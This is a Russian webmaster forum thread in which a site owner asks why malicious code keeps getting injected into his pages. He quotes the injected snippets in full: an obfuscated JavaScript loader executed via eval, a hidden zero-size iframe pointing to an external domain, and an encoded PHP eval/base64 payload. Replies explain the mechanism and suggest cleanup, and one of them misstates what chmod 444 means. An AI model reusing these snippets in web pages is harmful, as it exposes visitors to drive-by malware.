Форум Не про работу Самое разное

Кусок кода прицепляется. помогите!

[Удален]
386

Постоянно в коде сайта нахожу кучу ссылок на доры. И постоянно в php код цепляется такая бяка. Пароль на фтп менял и нигде его не сохраняю, но всеравно как то пролазиет. Как это работает?

<body class="contentpane"><script language=JavaScript>function mwban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,0,38,55,37,5,19,4,3,28,0,0,0,0,0,0,61,12,47,62,34,23,25,16,57,22,41,40,35,29,20,21,14,8,31,46,11,33,52,50,10,9,2,0,0,0,0,32,0,13,36,17,53,51,60,39,1,54,49,18,42,6,15,26,45,48,44,43,30,56,7,58,27,59,24);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(161^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}mwban('ILfe5yrdnXMd1EadkeJU4yfe7xK25yrqNeAjnE@LInaWO69DmiYWvnaqA69_n8Ae7eHq7nJqhX@VZeH_YEMdcBJLPopdI0KbcLrjk0QWnRrePIpLtoKDr89dY0uVP6@e5gQy1EMWnPaqnEreAgQDTZJ4cPF4QlKU86fbZxKDmPz_IL9jOgAgGkHbh2AjQx9WOeYbGPF_kEaia6Ag8IAWkvMe1L@2nyfe7nugMwQWvnaqA6fgmDQ')</script><!-- velasat.ru -->

roma095 добавил 07.05.2008 в 11:23

И вот еще:

<script language=JavaScript>function mwban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,0,38,55,37,5,19,4,3,28,0,0,0,0,0,0,61,12,47,62,34,23,25,16,57,22,41,40,35,29,20,21,14,8,31,46,11,33,52,50,10,9,2,0,0,0,0,32,0,13,36,17,53,51,60,39,1,54,49,18,42,6,15,26,45,48,44,43,30,56,7,58,27,59,24);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(161^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}mwban('ILfe5yrdnXMd1EadkeJU4yfe7xK25yrqNeAjnE@LInaWO69DmiYWvnaqA69_n8Ae7eHq7nJqhX@VZeH_YEMdcBJLPopdI0KbcLrjk0QWnRrePIpLtoKDr89dY0uVP6@e5gQy1EMWnPaqnEreAgQDTZJ4cPF4QlKU86fbZxKDmPz_IL9jOgAgGkHbh2AjQx9WOeYbGPF_kEaia6Ag8IAWkvMe1L@2nyfe7nugMwQWvnaqA6fgmDQ')</script><!-- velasat.ru -->

</body>

</html><script language=javascript>status=location;document.write('<iframe src="http://xepace.cn/tdska/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script>

<?php eval(gzinflate(base64_decode("nZJBboNADEWvghBSoFGpmWHcRARyg0hdV+1oCk6hJQENDgmLhquXRZdBirq09e3/vmXvGwgHpVmWYICFjjvM0apKtsCgRTXVWuXSwgCt4JiwkGn0nHgWSXbQxCewKgfSubA4SZAVyULn0EAhKE7dx9AMJrqco/XL+Wp4XONAZJZZVrFpLW/tmDlO5mAaTb6r1Rfb4RqdLz+865l29joSj/Sxljen5OqhjsInN/E6YGWhEkf81A2eJEM7oTGmd4ImXo0UHwVDqRvY6ymxGnC6QUziTyVJpR3bmo7+rF2QeIS9MFDrVpXQ6hwbWcB0iMUi2TfW98pJV8keDRxUD50gPKSQ3Gpv7kK6ObpcBjMcTpg6eWn9xhbzKV5v7XwLnHfH+8e7BAn1pvbdbeaGM1Shu9m6QfIL"))); ?>

[Удален]
#1

Нормальное явление. Ищи у себя на хосте левые или измененные скрипты которые такую бяку делают.

Еще как вариант, временно можешь прописать chmod 555 * через SSH чтобы твои скрипты в процессе поиска вредины не изменялись.

neolord добавил 07.05.2008 в 11:59

Работает то кстати очень просто, яваскрипт генерит из массива кусок кода и выполняет.

А пхпшный код наверное этот яваскрипт и втыкает.

A
На сайте с 07.05.2008
Offline
0
Alltoday
#2

привет, буквально неделю назад занимался удалением аналогичного кода,

который прилепился к страницам PHP после окончания тега </html>

причем, судя по дате обновления страниц, происходило это регулярно

"оптом" в районе 5.20 утра....

- поменял все пароли...

- скачал AVAST Home Edition (бесплатная регистрация на сайте avast.com)

- скачал TrojanRemover

- почистился на компе

- поудалял ручками "прицепленные коды"...

- обновил по FTP

- потом всем страницам поставил CHMOD - 444 (только чтение)

Где "собака порылась" - не берусь утверждать, но сайт вторую неделю как ЖИВЕТ без этих

кодов....

статейный маркетинг (http://seo.alltoday.ru)
[Удален]
#3

Друг, 444 это только исполнение а не чтение.

Всякие трояны ремуверы здесь не при кухне, это проблема не клиентского компа. Файерволы или AVAST кстати тема чтобы больше этого не было, но уже имеющуюся проблему это не решит.

Тут просто надо проверить все скрипты, можно тупо сёрчем на наличие измененного кода и в т.ч. вот этой страшной закодированной строки в PHP

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий